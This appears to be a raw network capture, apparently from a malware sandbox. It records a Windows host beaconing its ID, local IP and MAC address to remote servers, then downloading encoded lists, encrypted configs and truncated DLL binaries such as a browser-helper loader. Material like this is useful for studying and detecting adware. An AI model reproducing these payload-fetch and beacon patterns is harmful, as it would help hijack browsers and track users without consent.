Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 2197516
Last-Modified: Wed, 20 May 2015 05:35:34 GMT
Connection: close
ETag: "555c1d26-21880c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKibQ8n5NnLuapg1eJ6vpylpPr3dzrdXxDw/xC0 hi48ahKqWrxewH8xxVOe3p/W0voytInO8LEpKJSqresov4P7JUR/tgBZAFWH2h8Hz/vZC73IP xJBA3Er7TyHyYD0jE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2q6mjxhRug0Yz4h3K0AOlFokInOHjne8fpDJamidMpAhN2nIOvAyJtIiik9bH5OPGXJyfQNpBOtYm ARi1SoBtib4BGLVKgG1RrlJWPxioMMcfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvvnWNUBCeri6vcqJUJDGDDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wv9P2tToITuQcTazQ2ZSPlrf3n4jIIw/2PE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTryY6XxeOXh0OjL9uMzHZHqjE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVFNmcZPjX4jLy8pYTvxe axNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWKANo2jqKBv8Ztb v psEtsTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWGxEKfoBEbH/iKDnmhUeQSvE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ509fciHFohbrUKQo3SDfcckk0QLBQpmZkn1zTZVpHtvDynQRoV7CxP E/mxZqCXYR7KIWNX8fr6MQC8DLejYMRbS5B1WxoKLegZBeMSPxMQxasgm6nQO23Q3oGXGco vnawTsm/ZT2FfXZE8kq pcz0Hcz/UlH 3yO
<<< skipped >>>
GET /txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 3747852
Last-Modified: Tue, 02 Jun 2015 03:08:56 GMT
Connection: close
ETag: "556d1e48-39300c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLEwXHZOeqxhaNHsFJPygV5N5GdwjtmQLE/qfU9HvR8A9sSORw exnVF6psBA56drufRlRCIZxMrNCb9pdZ SzG7SnYDX74h7v9V 2E2jzr/jtMOEVDZTCvvCVqqMAS/u1iz4mhopJO0A557 PzIRYanKixfw4v1nkqb RqxQHMI8TazQ2ZSPlrueKHSyn HxKzdxPJVb22ufdg0 sDpLF9xs2uTSe47l/L3vgIuX1hA3mn IohxMHsWCHV8ybcrb2XJyfQNpBOtYm ARi1SoBtib4BGLVKgG0MdvCiDwkpTIr4wJH vtXy6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvjQ iArxdhdB5i9zYlh3A/xNrNDZlI WvE2s0NmUj5a7E6Lj14vcKCvHloLLTHJfDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrMeSNkdky0GDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr/scZcqIZVXzpChets/4fM3E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWwmwgWD4ygf/KbOy3dpQoDxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW ACc 6GEp9BGwDLuSqumXcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWFMf2YO529Rm65lMOiWA47XE2s0NmUj5a qSnCa1jASD 8BgGQTR5rVH pJjTqpJgKRlBXEZaF DxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpKaHUjqrw7Cn5TosG6X1WJKNGbDqOkocKG/Y20xSgdf/GEPDtVCynaMmR5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRdkyin3v0 abkZX9CUqPKznL5y1ptSZhF 0fIc aBDnuaZ F3oOzw8FQu4ds/WP4kJLioQCSs4YA
<<< skipped >>>
GET /asb/apro.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.92zy.com/asb/apro.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Host: VVV.92zy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 03 Jun 2015 02:46:13 GMT
Content-Type: image/jpeg
Content-Length: 202
Last-Modified: Sat, 28 Mar 2015 09:48:14 GMT
Connection: keep-alive
ETag: "551678de-ca"
Expires: Fri, 03 Jul 2015 02:46:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
about:..res:..baidu.com..123.sogou.com..hao123.com..icafe..1x3x.com..https://..VVV.sohu.com..VVV.sina.com..qq.com..taobao.com..tmall.com..c:..javascript:..VVV.1x3xxx.com..adpubs.yaolan.com..92tezheng.ma..
GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:24 GMT
Content-Type: text/plain
Content-Length: 71356
Last-Modified: Fri, 29 May 2015 03:54:18 GMT
Connection: close
ETag: "5567e2ea-116bc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLDnfyUHo1L2rgykKjEqfmpq7bcvyuOAbNWi0f4vD5S3GA jKk SLSSdkwRO7vkhVfkkyCAvWyVuXynxcnYiazqGPqoc49OClLztWlDZ12mHAnlforgf7zQ6V1c9o lLAbDRZFT2CIbJmqQmrWWV/ahkveKFZZtCKNxyE11iaSfexm44r2ObaL17YA0WBF/CmK S5mnOOUdpOuZ2HgP60hW4BaxQmDgbVnq0d15lVGosELU/92 QSlmcMj7bo9QsO6Pwk2kKXPvQb9oW9RvnvCiKddSP5OfdGwk7dGWHkiysufVgHxAFfjNzgdxyf09u/1twsXmGbDvMaKtoP2CwD6idva 2Y2XLu2zkMwBvp LQcnt3PX9Mw8tsIjtVs4tu3fKUoe2g92NlUsMSnT2sczOAFELEmZgER YfMYX8ZsD2RJIbzfb PVf9j8Y5pxJ rhAdidFlga1wJjSZI0ZOiQOknDc0pwLp3f2PxjmnEn6uEDU5sANNjc39bR09zcG9D7JZgVvPcKlAIh UYD6IMDRYEwA7BYvcP1gWqmYzB6K1iBnKNJsAgR2WmRADv7S4Gn9F0lmIy49S4G /Izdz4HyquyiPz1M0HqipwM2j4C3gFseQd56LPRg3w7dtro2zf7MSFUnCs2VbAN ApRJcyCSFlNdX1UBtpX1lrzwxNP2Xw/E82OARqd7OP9UcgcVFarVvvyM3c B8qqhDFZc1qnKKZ8ij1EiIq87SoYvkcPDj0zit8bCNKNJywv6br9luOyoD5j0IJcHAtXOJG13P7Zj01r2GOOSHiy4fPSocCXIgzBJyd7I/PRMI 6A sMU1MDC6grdH/yBJPyaUMSCxbjh1ybvySc7PVMI7Ht N8xPXgr53YH5vJMzJRN5xlbKsBR850bBJNl5xxXLTJfmtbGvg3Yroza4iDjS8OPx9IEDbZZqtQCVSmfp7adQzfP 9zsCneIliciUhbKkA /qTsrmJebjsXPgVaVbDzqY/kg1GxaFkW8GBBKLxaekEpRydKri3/9JQFIJpKviNhiG4lGUujm24y3kfObcWkTOpTw1jAZRxyObL8lC8paDFiG2Yv0KHLA3FEp1QlOWnsx6VWakSmmrRGOdxPMFzN4ilyaLS5E/7Vm5alNnhjDe/y4Gr5s/1RyBxUVqtVyBN3LV5cWd/s8xj4k1JNYqeyHHr1Hj 23W7KPTgk7wNTdzWHJvSBmeNzWc5kDyd9N 7EprsNyLhza9pSCVncipMW49ywvdOTKhBG/c5YxsI/4mPO01uKUF7Y6WmItj5qiw/8Ttv3VRObeWcEEZfkPT8Y/Gzz/znAKd4iWJyJSF5QEDQqBYLwqqKVwpBO8TJWM0SrN0V 5NpqdGuQAJ0b8BZ5puXacqoGM0SrN0V 5No103z0CC5kOyTR3R 1t1yBZSovhA/NfeOK3xsI0o0nLu mN5aCoABKej0dpkceFXYzRKs3RX7k12w5Jk96 1b0LXbHHmzkyi
<<< skipped >>>
GET /bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:39 GMT
Content-Type: application/octet-stream
Content-Length: 57209
Connection: keep-alive
X-Request-Id: 5b480a8636a9c82ad77a71c0d3687a89; aaf93b24edaacbea60fd3cf9a984ca16; f5aed991e02259cc470b700031d517ff
X-Source: U/200
Last-Modified: Thu, 04 Sep 2014 01:22:39 GMT
Expires: Wed, 10 Jun 2015 14:10:58 GMT
Cache-Control: max-age=686094
Accept-Ranges: bytes
Age: 40235
X-Cache: MISS|MISS from cache_img_88; MISS(S)|HIT from cun-sd-tao-076; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z.....t.ap'.....}|'.ap'F}~'.ap'.Gz'.ap'.~{'.ap'Ki/..QFi-'.8.1q'.(..{0..:At'.ap'RichT..g.....PE..L...c..T..r...!.........`..................(.....0....!............)..8................E.......d......_............1...........text................. ..`.rdata................R@..@.'...DS... ..........@....reloc......j. ...`..G@..B7.................g...D$....V3............T$.RP.t$..Q........0D$.#......#....SR.T$.Rj.P.Q...uZ.\$...uR.D$...t0.T$.F.....RSP....u..D$...t...P.Q........P...R..D$..T$.X.%..Z. t.....P...Q...[^..........Q.D$.V3.;.tc..p.Rhh.......t. |L....;.tD.T$..t$...Rh(#.p.Q...|"....;.t..L$.QP........D$......P......G^Y.....Vj.........@P.................t...u.b.p..t..0...S^.3.^F..QSUVW3...`9...|$ .\$....D$.Pj@WSV........t4.L$.UWQ........ .P.....X.A.D$....P...8.g_..^][.......L$.j.PQ.....M.....j.h....d...@Pd.%.......SV..W.t$..F.P.......D$.3.j..|$(.F...n.....@.....F .~$.^(.D$$....t....L$..~`.N\.~d.~h.T$..D$.RPhp ...D$0........~l.|$..|$ ..f....t..D$.;.t.P...........<m.........._^[d...."..a.rQ.. ..........V........D$..t.V..iA.Q.^...................|$........G`u.0.D$.....t..H..@...t.<.t.......Q.m^....O(.w`.wd.wh......_ .o..D$ ..3;.t....6P...........;.u..M.Q.*C.....3.W.E..E...v.L$._^]..!..P.....VWh. ...C(.{(h.......\$..P............>.......j.V.5..............h| ..;....R.%.....Cp....2. .]8.@..Cl5..a5.......3...\....I.....v..uh...K...t).A!..."<.t...uI..U.A....g....\$._^].Cl[Y...u.j....M....C....w.;.s.".. ...U....*...{
<<< skipped >>>
GET /browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:44 GMT
Content-Type: application/octet-stream
Content-Length: 414887
Connection: keep-alive
X-Request-Id: e53d8163bbd3bca64131c4ac67b2412a; 9149848c88d3fd6ca3e92456c0b77697; 8dc45fba0af04f124afa4838b4ec2b90
X-Source: U/200
Last-Modified: Tue, 21 Apr 2015 09:19:56 GMT
Expires: Fri, 05 Jun 2015 10:16:32 GMT
Cache-Control: max-age=667295
Accept-Ranges: bytes
Age: 467507
X-Cache: MISS(S)|MISS from ctn-zj-hgh-092; HIT|MISS from cun-sd-tao-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z...dD...*......T....*.Y.....*..W..@..1........&.*..}. .Q.}...@.. ...*..r...(.1.........1.r...@Richl........PE..L.....6U.............r...p.....*.........&....a...... ....2. .U......)..,..=..........P.....C.@.........$:HC...............text...lq.......0... ..`.rdata..@U.T.PV...v.....R@..@.'....H..............%..6....rsrc......,.!.. .....P........F..h.}G......Y.....h...............................f@~G.............f..G......`...........o..f .G.._.......O.....%H.h.%H...H.G.P..L.G....I....-U......P.H.3..E..E.P..<.G..E.h..G....I.......M....3........]@..j.hjQG.d....PK.`P.E.d.....h.'H.j$h..I..E......t...3....8..'H..7....D....I.Ph......b..h..G...4.I6.....x.......M.d.....Y.....0..X..............h<.I.....(..... ....@..D@.'.. ...@.p.k...h...$..E.....j.j...:..h.L.g8.I...).....`..G..L...]........h..I........$..G..6[. h....*...........@.T.I...^....H.I....@.x.F...8...D...<...h0.I.....G..h$]. .... h...........I..%...h8...... hB......p.@.I..."..L.......-.....`...o... .......@...E..u..Z........$......\$H.D$H...-........QU..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^].`..........E..t.V.b...h.^].....x....y.....U..j.h.?`.3...c.V.E.VWh.....}.j..u.....k.0.F.).r.F...F...p..3..F....Df.F..F.f.F .F$.F(.F,.F0.E....u(.E..E...H.P.M..i...h..H..E..E...H.P.jT..WV............._^.M.3..~.P......V..V......F,.....t.P.0...0.F,..2.F$.........2.F...............#..E....2.F..........#.Fs...........^.....p..
<<< skipped >>>
GET /config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:51 GMT
Content-Type: application/octet-stream
Content-Length: 16021
Connection: keep-alive
X-Request-Id: c72c8390de4e17724de7685b042d0ab3; eb12280e9a2f424ebe112d688c68fea1; f8cc4faca9efb76ee37aa23448c9214b; c5debba4eac524c91ad94922bf47e895
X-Source: U/200
Last-Modified: Tue, 28 Apr 2015 09:53:39 GMT
Expires: Sun, 07 Jun 2015 13:27:51 GMT
Cache-Control: max-age=656634
Accept-Ranges: bytes
Age: 272574
X-Cache: HIT|HIT from cache_img_86; MISS(S)|HIT from cun-sd-tao-074; MISS|HIT from usn-us-sms-098
.GEMCF...q.KQBJ!FNpm$ \OpC..Z.TSN0....Y)..M@.N.._HWoID@.R6ZW_.N..ES.K1.HB..u[ML..Y.CSRV0....7@GJY.].SHBI4.XB.A .@@L.Y.KLNT'$...R)YT.L.B.....#NFQ.G..P@R...KQ[M7V..R.f.MJUH..;.O[/...Y.=ANS...T..DU-]\Z..m.....E.XKPMnQH.Q.p@F[].]..[CS#NDXNM1C.HT.N.X.......\N.E..@PM7.RB.J?A.LN...H.A..C.l.qV...KOH..5.Y).....M"I[QQ.m.P@F._IGSJ.....P.o....S.J....s..`*OL..R......<CJD.[pMLB]S.S......JIQ.m...E.K.]UI]mW..S.k2.UB.K..~.p...P..F6..Z.po.....B~...F7V\..D4WZ.B.G.SKP.q.XBNM0RTXVO..aI%@YN.....L..W...J!RX..A3$....WLUS.F.N.C"YTX.....RBN<TE.U.)L ..V.SK..u.$.0.K...@u.CZh.._XV.._....v..@.R.S@..<V\ZNXl...B.H.A^(..~.`WH..F.$.;oVIV.17C.z.@..O.D....A.U.h...9C.@Y_.3N..X.=@_XC.D.AD.Y.]..S.o.P@..D.EX.@:HEK.\pMM.O.O.Q.ON-MWZ.Yp...V.Z.qY._7OM.R..UI^%Y.Z.I9BNV.Q)D..XD..V.]IL]H.s.....h...T.K.Y/LZ..YY..OI.Id.q..U.pM@6.q....nBH..DP@.W~.q...O7JVl...F]UR/LN..G0OM..Q$.r.^.I1[......0VQCz....FO.O.{KE.(UFA..l..DD.E...z.`Y<BLYD....NT$DS..].V..E.Q^Fd.E..J.l.B.XO/..Q.PL..H.P]1ILZ ... .....G:........Z.Xr.J.P.h....W.^....#.H...sOE$...h....^sD..R.mJ....IU..C.$.I.MH<..KGS._....#B...Hl..K.U.PE...yG..T.n..M.Y...Z._q.....:.FMD......[m..KY.=.B..V.R...."E.N..o.A..QHT....#B..RJi..N.U.VB...xE..Y.=...D.......p..HQH=K.J.Y.J.ZB.w...V.j.......F.._t.MK..jKFM.L._...^y..N.O=..M.W..G.AXt.....g...C.O.._.XqGO.TKm..ICRLP....#C....<.B..Y..._..&E....sJ.MCY.R.X.\%.H...;..LCXNQF^E.#...M.mO...QI..X.\u...!Hi....Lk.....v.jKW.n..v.`L]H.r....1q.WA.X._....u~..T.f....>.^....y..rM.f....R.8....r...Vqs....S.T.c..`E.Ao......H.OUYm...P.k..p.X.^....Z...X.g....>.^....x..rM
<<< skipped >>>
GET /dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:55 GMT
Content-Type: application/octet-stream
Content-Length: 227879
Connection: keep-alive
X-Request-Id: d5941be296a7c272f10744274c1725a2; 3d3e824cb3467a9fb63057493af2f01f; 8d24d23f7c67e8c505ebe2e94e3d5363; 405cf54c09a2caa748497801b9acab61
X-Source: U/200
Last-Modified: Tue, 20 Jan 2015 08:16:57 GMT
Expires: Mon, 08 Jun 2015 01:24:50 GMT
Cache-Control: max-age=667973
Accept-Ranges: bytes
Age: 240898
X-Cache: HIT|MISS from ctn-zj-hgh-091; HIT|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z..Hv....f...Q.E.....1..G.......f..o.....1...0..g.q.f.)`.....1...0.....1.....1)`...@Richd..w.....PE..L......T.......!.....:...x.............P*.!....R..... ....2...M.b.....@5..8..1............d..........@..............4.. R..8.....:.....BP...........text....9............. ..`.rdata......Z....>).R@..@.'. ..U.. ...R.....M..(....rsrc......,..X(..@.reloc.........6...\(..BY.....)..h......\P..h.H...*...Y......j.h......d....(..h.&...&...j.j......hpH..........C...U......E.P..DP...E.h I....Q...........]r.uhPI....B. h@.......0......0.%...P...h`...k........(.....u..............hp.....!.:1. h{=..........".............h....... h.......p.......".....&........V3...tR.:.tM...&.E.PVh....VVVRQ.. P....uO.u..u..u.P.u..u....P...u......`.D....H. .^6..0.bj..u.Q/..,..&..........`V3..E.Q.@..tV...Q.E..u.Ph....Rh...........W.E...tP.u..M..u.QVVP...... .E-..P$..Q..3........U.........p ..3..E.SW..................W..|................Ph....j.WS.............P..V...I......q............@P...C.@j...L.............t:..uE.... ..%...W.......t.-......_[.M.3........].W....0...........w.........M._3.[.b......... .).. .pV.............................;.......Wj\S..V...............G..................... .;..G.....VSP..........,....B.....5:....N...F..u. ......=.....VWP..=...=...=..n..b..... ....@..3...#...............Qh....j.PV..`....3......@...............p...PW..A. .......RJ..u.".PSP.........t(G..t.3......_.#_^..".....v..G..-....-.... .^......U.............@$.E..
<<< skipped >>>
GET /fetch_data/2014-08-21_17_15_35_123/fetch_data.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:00 GMT
Content-Type: application/octet-stream
Content-Length: 128931
Connection: keep-alive
X-Request-Id: 4f2430bbe391f89e8b8a81ccc80dc396; 456202ee7534af014907b39d32ee5e85
X-Source: U/200
Last-Modified: Thu, 21 Aug 2014 09:15:37 GMT
Expires: Wed, 10 Jun 2015 15:58:08 GMT
Cache-Control: max-age=672278
Accept-Ranges: bytes
Age: 20012
X-Cache: MISS|MISS from ctn-zj-hgh-093, MISS|MISS from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z.............p.q.......i....1W.....V.%.....5....1%..8..........S.....j@..m..1..h..@Richd..w.....PE..L......S......!......................0.......`...........2.0.M.... @. ..,.....@...... ...h.......x..0..(.........,...02..8.....:(....B0...........text.................. ..`.rdata....................R@..@.'....\9............(....rsrc......t...(..@.reloc..............(..B......%..hp).......Y.....h`.......P........%X.......h.............|.....u......h...l...h.).....!..1. h.=..........s.............h....].. h....Q..p......."......;...}......U..j.h....d.....P...VW.p...3.P.E.d.......}..E...0.E.)..j..G......G....h<........-...}...E.(..Iv0.E..0;.t'.I.j.j..F...P.!'..j.h.......#&...6;u.u..M.......u............M.d......Y_^..]......v...j.hx..b............$....S....P..$........j....1...L$D..@....C..$.;.0..B%.1.......P........0................p.......i......D$,..$....P...0...D$.{.......0...=.0..h0......=6.............. .;L$,.......^...L$l..$....y.`...D$|....D$l... ...D$...C.D$ ...;.........D$(...1....L$(.........s.F..L$()....D$d.t$.....P..t..L$(.=3.....F8...|$t.t!.|$x....d.CD$dP.0...h.....@.........u.L$...,...Z..x.r..t$d...x.2.=4..@.........#A...D$0P.L$H..C...<........C.......$.{....D$8..P.......$..........D$D$... ..x ..L$l.......@....@...$....tbh......$.e.P.$.......P.>9......D$|..$........|Ph......$....h....P...C......6.%..6...^.._i..$.8i..d...f.MdPh0f...f...j.!;.j....@.D$xe.0.D$..a..D$d...2|.. .a.L$<.....*......-..|......
<<< skipped >>>
GET /goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:05 GMT
Content-Type: application/octet-stream
Content-Length: 252624
Connection: keep-alive
X-Request-Id: c4109171c08354e3f45a1ad9c1f52117; f79cf9d216a55a01bdd5fcf0ac5989ae; 42d75530002f19947f0d3f973db1e3b6
X-Source: U/200
Last-Modified: Wed, 04 Mar 2015 03:08:51 GMT
Expires: Wed, 10 Jun 2015 00:02:59 GMT
Cache-Control: max-age=679033
Accept-Ranges: bytes
Age: 84080
X-Cache: MISS|MISS from cache_img_87; HIT|HIT from cun-tj-tsn-073; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z..H.jt.q.'...)..'.q.'J .'......'.q.'...'.q.'.#.'/..1.'.....'.q.'...'...1.'.P.1.'.@.1.'...1.'.0.....1)....@Rich|......PE..L....t.T.......!........................:.!....R..... ....2...].q.....@.5..8..1............e..........B@...K....ZP...;......:.M...O....P.......text.................. ..`.rdata..|...Z.....).R@..@.'.0.H. .....6...M........rsrc....!@.D.-..(.`@.relo).......]<....(..BY........h.........Y.....h............o......._.......O..e@....?...&U......E.P..D....E.h.....`.............]..@.....6..h.C. .... h.......................p.l.....:..........h.....t.....$..................2.....@..!....j....X$.....P$...F...H...T...L....h@$...........h....._....%...?...h....)...f.....u......U...E..V........t.V....&.g.^]...-..0...E..U....H.].. ......U.....u.R.P..U..H.;J.u...;.u.....9."2....X.....`..;H.u...;E.u...-....`....L.......U..QV.u..E......$=...u........L...E..F......Fb.......:.u.3.QR...[.....^......W.y...A..u. ._"..9"......$.E...V{.c..u(j.u.#..w..h.L........q.uPV.:.....O...M.../n<....{o......Y"..U..V.u.V..;........E..0t..@.....^..D.@...........@.C..M.......u..9.u.3.RQ........_....W.z...Bs.!._ ... ..X.....V...~..r..6.P....j..^...#U..S.].VW...M..{.;....... .9}..B}.;.uG...9F......._....F.r...Qj........u..._..^[]........\..............F.;.s$.v...W......M...tj.{..r...e...r*...(..u..~....r..._....g.r._^[...s....t.W...PR.h.....D...~.r.....8/..,.........h M...i3...._......;'3....0...}..VW.}...t"e...r.S....t.WSV...}.AS...~.C[
<<< skipped >>>
GET /goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:13 GMT
Content-Type: application/octet-stream
Content-Length: 7776
Connection: keep-alive
X-Request-Id: a453f74a7d64b13acad0d504fc582b16; 7a396f845a2e2492b4377a23a2ac0097; 2e004e7f159702521d50c479b24d71ce; cbbc5f57908fd61fe43f33dfaf374b42
X-Source: U/200
Last-Modified: Tue, 02 Jun 2015 08:12:04 GMT
Expires: Tue, 09 Jun 2015 22:18:45 GMT
Cache-Control: max-age=655565
Accept-Ranges: bytes
Age: 66874
X-Cache: MISS|HIT from ctn-zj-hgh-096; MISS|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
...............................O)...$k....62a8^&Q23.I14.....#p...bI...).W.iXB....P..mL.$....TX"...b...... .s..m_P.\.".a......>.I.i.....F..b........"3.`xf.[.."X..w.#@P*@%...#.e.G.`L*X.A.....Y.A.....v.(..../.n..!O...]j....`\x...e..;.F.k.6..a..5......-?s....y.h..7.[.....8.......%5..q.....~2.!..a.P........9.t.. ..`Q...P......ZFC9b.Q$4L.ot.V.._..(.K|.H...B.2&..>...X...<...n..ah/..=..i.?5S.c.PA..."...4 @..B)...........,.g-hv..rh*...5...T.&uY@... |Pf..#.~.u...#..rv.t'\.dx`...............e.}C.L.........2.n=.bl..o;....#fk<O.ySh.c.....R. ...G...G...U.i.........|4...6........E)...o........E?..q!.x...............#..Z.4f..f.W...H#.....t.R.......H...u..V)D.<*V....3Y.....]...{t.T`.tw..&Jm....G...... ..f..*C....\....A....8.$............d[=.....5...*}.0....\..^....L..Eb....0......j..b.R@..]....i [I.......3........._..q......,......5o.......lh..m.|...dP,....XJ...&..O..y.............".....}|.:I.S...J.?A..dk......#6'.% 0b~....l..k.n`..-...Tmvy....:.}.t.....&..]......$........I....*.`.D.<.R...p'_Z..`..p..:.b 0.l.G.. .........;.g..x....'....a.yAU8.G...4y...{........n...!..e\F.....8.~....d...4....HX.E(e.D..0_?.I.Ml1..R.%!.{....G%E...&.u.6...s...c.........#J0d..\...n.y..X.D.9s........E...C.P..._&p.k.e.{7..p.K...Hd...Oh..j...Q........P./ <=.<..K.`.m..X.w....U<.T..$....'Ry..yb!.)Z}..__..^.e.............F.ud..F.Ri..._........]..;.....}..........D.......^/. ..}.......$.....xq.)..s..e*..'iQ....a....:...Fm.......}^....`..`<Z.......)T.>......c.../...........h....|M..5Y.F0......QA2.....HS.........H.......C....
<<< skipped >>>
GET /hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat HTTP/1.1
